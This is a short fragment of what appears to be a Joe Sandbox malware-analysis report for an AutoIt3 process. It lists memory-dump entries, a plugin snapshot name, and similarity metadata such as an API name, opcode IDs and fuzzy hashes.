                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: DestroyIcon
                                      • String ID: (m$@
                                      • API String ID: 1234817797-4118167608
                                      • Opcode ID: c4c9db8c4627d60f9ef57ce78fb3e1d227de7f32f55502322b85fbbca72ab0db
                                      • Instruction ID: 4b782e1cac267571a6f93927125ae9b41ecfd6f6b10537d6c5b058dc3ac2df5e
                                      • Opcode Fuzzy Hash: c4c9db8c4627d60f9ef57ce78fb3e1d227de7f32f55502322b85fbbca72ab0db
                                      • Instruction Fuzzy Hash: 4BC08CA0748220475F14B7EAE91CEAA653DFF80380300022D7B07C6391DE30D9848FAA